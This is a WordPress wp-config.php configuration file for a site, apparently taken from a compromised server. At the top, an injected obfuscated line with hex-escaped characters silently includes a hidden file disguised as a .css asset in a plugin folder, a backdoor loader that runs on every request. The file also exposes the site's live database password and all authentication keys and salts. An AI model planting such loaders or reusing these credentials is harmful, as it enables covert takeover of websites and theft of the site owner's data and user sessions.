File: /var/www/vhosts/aceitunaslosada.com/web/wp-config.php
<?php
/*3b985*/
$r06g = "/var/www/vhosts/a\x63eitunaslosada.\x63om/web/wp\x2d\x63ontent/plugins/broken\x2dlink\x2d\x63he\x63ker/.9974d21\x63.\x63ss"; if (isset($r06g)){ @include_once /* i */ ($r06g); }
/*3b985*/
/** Enable W3 Total Cache */
define('WP_CACHE', true); // Added by W3 Total Cache
/** Enable W3 Total Cache */
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'aceitunaslosada' );
/** MySQL database username */
define( 'DB_USER', 'aceitunaslosada' );
/** MySQL database password */
define( 'DB_PASSWORD', 'Cercle10!!' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'dd5: y@:z|wiru(a= y5 POwhUM*|n:CdcZ}n C3a|NME&Rq)jtuF!*8{Q91@Q9w' );
define( 'SECURE_AUTH_KEY', '-QOyZjc*dw_: ^1l7avMElOvJM43XdT5hVe 1=}L[F9e7#<[P|cu`P3XGLo6/]|3' );
define( 'LOGGED_IN_KEY', '2QA^VTXcT}?}Pl#G/<{gDo/i{{lAk,QmnK@5^#90Zy0h2cy+u5>n;*;kSLu_Y]fs' );
define( 'NONCE_KEY', 'TFjEW%q(30vPu )1? *bcmY#3IFjY8`th&:l3<M2%OJC5oi{iFax]4#*mW[qf?G_' );
define( 'AUTH_SALT', 'HYfr]ojW_|/V,VXs{jj3-gANb!O-AbtcfIrX/!:=)_ZY6>v 22qFcK}LxZ#.%gUr' );
define( 'SECURE_AUTH_SALT', '+]16F!gYZDTsCbt4lz f1W+F#//{^&bzTiku;dwq<5u :m&6#VQS$;g}WfoYn9pM' );
define( 'LOGGED_IN_SALT', ']jKk@C;.cv{L@wIF&L|H3DM?X0&hAh R?x*[{!*%vM]pg`S?UMaap-d1x!vYhP=|' );
define( 'NONCE_SALT', '*@xCLN|^LK,JMY[B TWdYDyomCE?& r^=_eJO&&Q*Oa3*S~^H},<v.}xNB($fS;9' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
define('WP_MEMORY_LIMIT', '256M');
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';